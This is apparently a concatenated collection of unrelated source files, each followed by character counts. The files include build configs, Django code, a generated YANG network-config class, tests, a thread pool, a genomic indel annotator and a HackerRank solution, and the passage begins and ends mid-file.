'include_dirs': [ '.' ],
'sources': [ 'bslmf_tag.t.cpp' ],
},
{
'target_name': 'bslmf_typelist.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_typelist.t.cpp' ],
},
],
}
| 25,467 | 10,807 |
# Author Imran Ashraf
# The import syntax changes slightly between python 2 and 3, so we
# need to detect which version is being used:
from sys import version_info
if version_info[0] == 3:
PY3 = True
elif version_info[0] == 2:
PY3 = False
else:
raise EnvironmentError("sys.version_info refers to a version of "
"Python neither 2 nor 3. This is not permitted. "
"sys.version_info = {}".format(version_info))
if PY3:
from .openql import Program, Kernel
else:
from openql import *
# __all__ = [ init, schedule, compile ]
| 558 | 179 |
# Generated by Django 2.0.9 on 2018-11-17 22:34
import campaigns.models
from django.db import migrations
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('campaigns', '0009_auto_20181116_1943'),
]
operations = [
migrations.AlterField(
model_name='campaign',
name='image',
field=sorl.thumbnail.fields.ImageField(blank=True, height_field='height_field', null=True, upload_to=campaigns.models.campaign_image_upload_location, width_field='width_field'),
),
]
| 573 | 201 |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class apply_traffic_class_exp_map_name(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-qos-mpls - based on the path /qos-mpls/map-apply/apply-traffic-class-exp-map-name. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__map_name_cmd2','__all_zero_map_cmd2','__default_map_cmd2','__All_cmd2',)
_yang_name = 'apply-traffic-class-exp-map-name'
_rest_name = 'traffic-class-exp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'qos-mpls', u'map-apply', u'apply-traffic-class-exp-map-name']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'qos-mpls', u'map-apply', u'traffic-class-exp']
def _get_map_name_cmd2(self):
"""
Getter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type)
"""
return self.__map_name_cmd2
def _set_map_name_cmd2(self, v, load=False):
"""
Setter method for map_name_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/map_name_cmd2 (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_map_name_cmd2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_map_name_cmd2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """map_name_cmd2 must be of a type compatible with map-name-type""",
'defined-type': "brocade-apply-qos-mpls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)""",
})
self.__map_name_cmd2 = t
if hasattr(self, '_set'):
self._set()
def _unset_map_name_cmd2(self):
self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
def _get_all_zero_map_cmd2(self):
"""
Getter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
"""
return self.__all_zero_map_cmd2
def _set_all_zero_map_cmd2(self, v, load=False):
"""
Setter method for all_zero_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/all_zero_map_cmd2 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_all_zero_map_cmd2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_all_zero_map_cmd2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """all_zero_map_cmd2 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
})
self.__all_zero_map_cmd2 = t
if hasattr(self, '_set'):
self._set()
def _unset_all_zero_map_cmd2(self):
self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
def _get_default_map_cmd2(self):
"""
Getter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
"""
return self.__default_map_cmd2
def _set_default_map_cmd2(self, v, load=False):
"""
Setter method for default_map_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/default_map_cmd2 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_default_map_cmd2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_default_map_cmd2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """default_map_cmd2 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
})
self.__default_map_cmd2 = t
if hasattr(self, '_set'):
self._set()
def _unset_default_map_cmd2(self):
self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
def _get_All_cmd2(self):
"""
Getter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
"""
return self.__All_cmd2
def _set_All_cmd2(self, v, load=False):
"""
Setter method for All_cmd2, mapped from YANG variable /qos_mpls/map_apply/apply_traffic_class_exp_map_name/All_cmd2 (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_All_cmd2 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_All_cmd2() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """All_cmd2 must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)""",
})
self.__All_cmd2 = t
if hasattr(self, '_set'):
self._set()
def _unset_All_cmd2(self):
self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
map_name_cmd2 = __builtin__.property(_get_map_name_cmd2, _set_map_name_cmd2)
all_zero_map_cmd2 = __builtin__.property(_get_all_zero_map_cmd2, _set_all_zero_map_cmd2)
default_map_cmd2 = __builtin__.property(_get_default_map_cmd2, _set_default_map_cmd2)
All_cmd2 = __builtin__.property(_get_All_cmd2, _set_All_cmd2)
__choices__ = {u'apply-traffic-class-exp': {u'ca-map-name-cmd2': [u'map_name_cmd2'], u'ca-default-map-cmd2': [u'default_map_cmd2'], u'ca-all-zero-map-cmd2': [u'all_zero_map_cmd2']}}
_pyangbind_elements = {'map_name_cmd2': map_name_cmd2, 'all_zero_map_cmd2': all_zero_map_cmd2, 'default_map_cmd2': default_map_cmd2, 'All_cmd2': All_cmd2, }
| 16,919 | 6,170 |
import unittest
import dypy
class VariableSupportTest(unittest.TestCase):
def test_check_variable_id(self):
"""
Makes sure that when no variable_id is provided, we get the names
we expect
:return:
"""
name_id_pairs = {
"variable_id": "variable_id",
"Variable_id": "variable_id",
"Variable ID": "variable_id",
"5three Variable": "three_variable",
"Remove-my-hyphens": "remove_my_hyphens",
}
leave_capitalization_intact = {
"variable_id": "variable_id",
"Variable_id": "Variable_id",
"Variable ID": "Variable_ID",
"5three Variable": "three_Variable",
"Remove-my-hyphens": "Remove_my_hyphens",
}
for key in name_id_pairs:
self.assertEqual(name_id_pairs[key], dypy.variables.check_variable_id(key, None))
for key in leave_capitalization_intact:
self.assertEqual(leave_capitalization_intact[key], dypy.variables.check_variable_id(key, key))
| 904 | 370 |
import unittest
import baseconverter as bctr
class TestOctal(unittest.TestCase):
tests = []
results = []
base = 8
def test(self):
for conv, result in zip(self.tests, self.results):
self.assertEqual(conv.convert(), result)
converter = bctr.DecimalBaseConverter("8",self.base)
with self.assertRaises(bctr.InvalidDigitForBaseException) as context:
converter.convert()
self.assertTrue("invalid digits" in "".join(context.exception))
def setUp(self):
converter = bctr.DecimalBaseConverter("7",self.base)
self.tests.append(converter)
self.results.append(7)
converter = bctr.DecimalBaseConverter("10",self.base)
self.tests.append(converter)
self.results.append(8)
| 740 | 235 |
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UserRegisterForm(UserCreationForm):
email = forms.EmailField(label='Email')
first_name = forms.CharField(
max_length=20, label='First Name', required=False)
last_name = forms.CharField(
max_length=20, label='Last Name', required=False)
class Meta:
model = User
fields = ['username', 'email', 'first_name',
'last_name', 'password1', 'password2']
| 544 | 155 |
import logging
import os
import signal
import time
from multiprocessing import Process
class ExternalScript:
def __init__(self, name, path):
self.name = name
self.path = path
self.process = None
def start_main_loop(self):
if self.process is None:
self.process = Process(target=run_external_script_main_loop, args=(self.name, self.path))
self.process.start()
logging.info("External script started. PID: %d", self.process.pid)
def stop_main_loop(self):
if self.process is not None:
logging.info("Killing external script with PID: %d", self.process.pid)
os.kill(self.process.pid, signal.SIGTERM)
self.process = None
def run_external_script_main_loop(name, path):
try:
script = import_source(name, path)
logging.info("Script loaded")
while 1:
start = time.time()
try:
script.main_loop()
except Exception as e:
logging.error("Error in script '%s': %s", path, str(e))
if (time.time() - start) < .05:
time.sleep(1)
except Exception as e1:
logging.error("Unable to run main_loop: " + str(e1))
def import_source(name, path):
from importlib.machinery import SourceFileLoader
return SourceFileLoader(name, path).load_module()
| 1,391 | 404 |
import logging
import os
user_config_dir = os.path.expanduser("~")
logging.basicConfig(filename=user_config_dir + '/.cache/spotui.log', filemode='w',
format='%(name)s - %(levelname)s - %(message)s')
| 220 | 76 |
# -*- coding: utf-8 -*-
'''
Created on 15/06/2015
@author: david
'''
import sys
if sys.version_info.major < 3:
from SocketServer import TCPServer
else:
from socketserver import TCPServer
import datetime
import logging
from remote_control.dispatching import Dispatcher
def main():
logging.basicConfig(filename="remote_control_{0}.log".format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")), \
format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%d/%m/%y %H:%M:%S', \
level=logging.ERROR)
logging.info("**** [Starting server...] ****")
server = TCPServer(("0.0.0.0", 2121), Dispatcher)
message = "Waiting for remote control..."
logging.info(message)
print(message)
try:
server.serve_forever()
except KeyboardInterrupt:
print("[CTRL+C] -> Stop")
finally:
print("Goodbye!")
logging.info("**** [Server finish] ****")
if __name__ == '__main__':
main()
| 1,029 | 364 |
from queue import Queue, Empty
import threading
from threading import Thread
class Worker(Thread):
_TIMEOUT = 2
""" Thread executing tasks from a given tasks queue. Thread is signalable,
to exit
"""
def __init__(self, tasks, th_num):
Thread.__init__(self)
self.tasks = tasks
self.daemon, self.th_num = True, th_num
self.done = threading.Event()
self.start()
def run(self):
while not self.done.is_set():
try:
func, args, kwargs = self.tasks.get(block=True,
timeout=self._TIMEOUT)
try:
func(*args, **kwargs)
except Exception as e:
print(e)
finally:
self.tasks.task_done()
except Empty as e:
pass
return
def signal_exit(self):
""" Signal to thread to exit """
self.done.set()
class ThreadPool:
"""Pool of threads consuming tasks from a queue"""
def __init__(self, num_threads, tasks=[]):
self.tasks = Queue(num_threads)
self.workers = []
self.done = False
self._init_workers(num_threads)
for task in tasks:
self.tasks.put(task)
def _init_workers(self, num_threads):
for i in range(num_threads):
self.workers.append(Worker(self.tasks, i))
def add_task(self, func, *args, **kwargs):
"""Add a task to the queue"""
self.tasks.put((func, args, kwargs))
def _close_all_threads(self):
""" Signal all threads to exit and lose the references to them """
for workr in self.workers:
workr.signal_exit()
self.workers = []
def wait_completion(self):
"""Wait for completion of all the tasks in the queue"""
self.tasks.join()
def __del__(self):
self._close_all_threads()
def create_task(func, *args, **kwargs):
return (func, args, kwargs)
if __name__ == '__main__':
from random import randrange
from time import sleep
delays = [randrange(1, 10) for i in range(30)]
def wait_delay(d):
print('sleeping for (%d)sec' % d)
sleep(d)
pool = ThreadPool(20)
for i, d in enumerate(delays):
pool.add_task(wait_delay, d)
pool.wait_completion() | 2,390 | 714 |
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.isaac import kill_irritating_popup, disable_irritating_popup
from ..utils.i_selenium import assert_tab
from ..tests import TestWithDependency
__all__ = ["questionnaire"]
#####
# Test : Questionnaire Popup
#####
@TestWithDependency("QUESTIONNAIRE", ["LOGIN"])
def questionnaire(driver, ISAAC_WEB, **kwargs):
"""Test if the questionnaire popup is shown.
Must run immediately after the "LOGIN" test.
- 'driver' should be a Selenium WebDriver.
- 'ISAAC_WEB' is the string URL of the Isaac website to be tested.
"""
assert_tab(driver, ISAAC_WEB)
log(INFO, "Ensure the popup has not been disabled, and wait 30 seconds for it to display.")
disable_irritating_popup(driver, undo=True) # Make sure we've not disabled it at all!
if kill_irritating_popup(driver, 30):
log(PASS, "Questionnaire popup shown and closed.")
return True
else:
log(ERROR, "Questionnaire popup not shown! This may be because none are published?")
return False
| 1,069 | 328 |
#!/usr/bin/env python3
"""2nd step of the analysis
Checks if indels are coding or non-coding and annotates
coding indels with variant effect
indel_annotator is the main routine of this module
"""
import sys
import pysam
import logging
import pandas as pd
from functools import partial
from .indel_curator import curate_indel_in_genome
from .indel_sequence import CodingSequenceWithIndel
logger = logging.getLogger(__name__)
def indel_annotator(df, refgene, fasta, chr_prefixed):
"""Sort coding indels and annotate coding indels with variant effect
Args:
df (pandas.DataFrame): with a header:'chr', 'pos', 'ref', 'alt'
refgene (str): path to refCodingExon.bed.gz
fasta (str): path to fasta
Returns:
df (pandas.DataFrame): with indels annotated
"""
df["is_ins"] = df.apply(is_insertion, axis=1)
df["indel_seq"] = df.apply(get_indel_seq, axis=1)
# performs annotation
exon_data = pysam.TabixFile(refgene)
anno = partial(
annotate_indels, exon_data=exon_data, fasta=fasta, chr_prefixed=chr_prefixed
)
df["annotation"] = df.apply(anno, axis=1)
# removes unannotated calls (non-coding indels)
df = df[df["annotation"] != "-"]
if len(df) == 0:
logging.warning("No indels annotated in coding region. Analysis done.")
sys.exit(0)
# gene symbols
df["gene_symbol"] = df.apply(get_gene_symbol, axis=1)
# formats the header
df = df[
[
"chr",
"pos",
"ref",
"alt",
"rescued",
"indel_seq",
"annotation",
"gene_symbol",
"is_ins",
]
]
return df
def is_insertion(row):
"""Encodes if the indel is an insertion or deletion.
Args:
row (pandas.Series): reference seq (str) at index 'ref'
Returns:
is_insertion (int): 0 if insertion, 1 if deletion
"""
is_insertion = 0
if row["ref"] == "-":
is_insertion = 1
return is_insertion
def get_indel_seq(row):
"""Gets indel sequence
Args:
row (pandas.Series): a Series with 'ref' and 'alt' indices
Returns:
indel_seq (str): inserted or deleted sequence
"""
if row["ref"] == "-":
indel_seq = row["alt"]
else:
indel_seq = row["ref"]
return indel_seq
def annotate_indels(row, exon_data, fasta, chr_prefixed, postprocess=False):
"""Annotates indels for all RefSeq isoforms
Args:
row (pandas.Series): a Series with indices
'chr', 'pos', 'is_ins', 'indel_seq'
exon_data (pysam.TabixFile): coding exon database
fasta (str): path to fasta file
chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed
postprocess (bool): True if used in indel_postprocessor. Default to False
Returns:
annotation (str): Each token represents an annotation for one
of the isoforms and is formatted as:
GeneSymbol|RefSeqAccession|AminoAcidPostion|Effect|IsInsensitive
GeneSymbol: RefSeq gene name
RefSeqAccession: RefSeq mRNA accession number
CodonPostion: the position of codon (not amino acid) affected in
the isoform specified in RefSeqAccession
Effect: consequences of the indel.
See CodingSequenceWithIndel for detail
IsInsensitive: 1 if the indel is nonsense-mediated-decay insensitive,
0 otherwise
'-' for non-coding indels
"""
chr = row["chr"]
pos = row["pos"]
idl_type = row["is_ins"]
idl_seq = row["indel_seq"]
# generates CodingSequenceWithIndel instances
idls = generate_coding_indels(
chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed
)
# annotates for all RefSeq isoforms
annots = []
if idls != []:
for idl in idls:
gene = idl.gene_symbol
refseq_acc = idl.accession
codon_pos, effect = idl.effect()
is_insensitive = idl.is_nmd_insensitive()
if not postprocess:
anno = (
gene
+ "|"
+ refseq_acc
+ "|"
+ str(codon_pos)
+ "|"
+ effect
+ "|"
+ str(is_insensitive)
)
else:
anno = gene + "|" + refseq_acc + "|" + str(codon_pos) + "|" + effect
annots.append(anno)
if len(annots) == 0:
annotation = "-"
else:
annotation = ",".join(annots)
return annotation
def generate_coding_indels(chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed):
"""Generates coding indel objects
Args:
chr (str): chr1-22, chrX or chrY. Note "chr"-prefixed.
pos (int): 1-based genomic position
idl_type (int): 1 for insertion, 0 for deletion
idl_seq (str): inserted or deleted sequence
exon_data (pysam.TabixFile): coding exon database
fasta (str): path to fasta file
chr_prefixed (bool): True if chromosome names in BAM or FASTA are "chr"-prefixed
Returns:
coding_idl_lst (list): a list of CodingSequenceWithIndel obj
empty list if non-coding indel
"""
coding_idl_lst = []
try:
candidate_genes = exon_data.fetch(chr, pos - 11, pos + 11)
except:
candidate_genes = None
# check for UTR
if candidate_genes:
for line in candidate_genes:
lst = line.split("\t")
# parsing exon info
info = lst[3].split("|")
exon = int(info[2])
last_exon = int(info[3])
# exon start and end
exon_start, exon_end = int(lst[1]), int(lst[2])
# strand
strand = lst[4]
# 5'UTR on positive strand (insertion)
if strand == "+" and exon == 1 and idl_type == 1 and exon_start >= pos:
pass
# 5'UTR on positive strand (deletion)
elif strand == "+" and exon == 1 and idl_type == 0 and exon_start > pos:
pass
# 3'UTR on positive strand
elif strand == "+" and exon == last_exon and pos > exon_end:
pass
# 5'UTR on negative strand
elif strand == "-" and exon == 1 and pos > exon_end:
pass
# 3'UTR on negative strand (insertion)
elif (
strand == "-"
and exon == last_exon
and idl_type == 1
and exon_start >= pos
):
pass
# 3'UTR on negative strand (deletion)
elif (
strand == "-"
and exon == last_exon
and idl_type == 0
and exon_start > pos
):
pass
else:
indel_in_reference_genome = curate_indel_in_genome(
fasta, chr, pos, idl_type, idl_seq, chr_prefixed
)
lt_seq = indel_in_reference_genome.lt_seq
rt_seq = indel_in_reference_genome.rt_seq
accession = info[0]
gene_symbol = info[1]
cds_start = int(info[4])
prev_exon = lst[5].split("|")
prev_exon_start, prev_exon_end = int(prev_exon[0]), int(prev_exon[1])
next_exon = lst[6].split("|")
next_exon_start, next_exon_end = int(next_exon[0]), int(next_exon[1])
indel = CodingSequenceWithIndel(
chr,
pos,
idl_type,
lt_seq,
idl_seq,
rt_seq,
strand,
accession,
gene_symbol,
exon,
exon_start,
exon_end,
last_exon,
cds_start,
prev_exon_start,
prev_exon_end,
next_exon_start,
next_exon_end,
)
coding_idl_lst.append(indel)
return coding_idl_lst
def get_gene_symbol(row):
"""Extracts gene name from annotation
Args:
row (pandas.Series): annotation info (str) at 'annotation' index
Returns:
gene_symbol (str): gene name(s)
"""
pd.options.mode.chained_assignment = None
lst = row["annotation"].split(",")
genes = [token.split("|")[0] for token in lst]
gene_symbol = ",".join(set(genes))
return gene_symbol
| 8,893 | 2,760 |
def cavity_map(grid):
"""Hackerrank Problem: https://www.hackerrank.com/challenges/cavity-map/problem
You are given a square map as a matrix of integer strings. Each cell of the map has a value denoting its depth.
We will call a cell of the map a cavity if and only if this cell is not on the border of the map and each cell
adjacent to it has strictly smaller depth. Two cells are adjacent if they have a common side, or edge.
Find all the cavities on the map and replace their depths with the uppercase character X.
For example, given a matrix:
989
191
111
You should return:
989
1X1
111
The center cell was deeper than those on its edges: [8,1,1,1]. The deep cells in the top two corners don't share an
edge with the center cell.
Args:
grid (list): a list of strings denoting the depths of the teeth
Returns:
list: a list of strings with X's in the place where there are cavities
"""
output_grid = grid
n = len(grid)
for i in xrange(n):
for j in xrange(n):
if 0 < i < (n - 1) and 0 < j < (n - 1):
if grid[i][j] > grid[i+1][j] and grid[i][j] > grid[i-1][j]:
if grid[i][j] > grid[i][j+1] and grid[i][j] > grid[i][j-1]:
output_grid[i] = output_grid[i][:j] + "X" + output_grid[i][j+1:]
return output_grid
if __name__ == "__main__":
map = ["1112", "1912", "1892", "1234"]
print cavity_map(map) | 1,494 | 510 |
"""
Functions found in shlwapi.dll
Shell Lightweight Utility Functions
"""
import logging
import ntpath
from ...call_hooks import builtin_func
logger = logging.getLogger(__name__)
@builtin_func("PathAppendA")
@builtin_func("PathAppendW")
#typedef(BOOL PathAppendA(LPSTR pszPath,LPCSTR pszMore);)
def pathappend(cpu_context, func_name, func_args):
"""
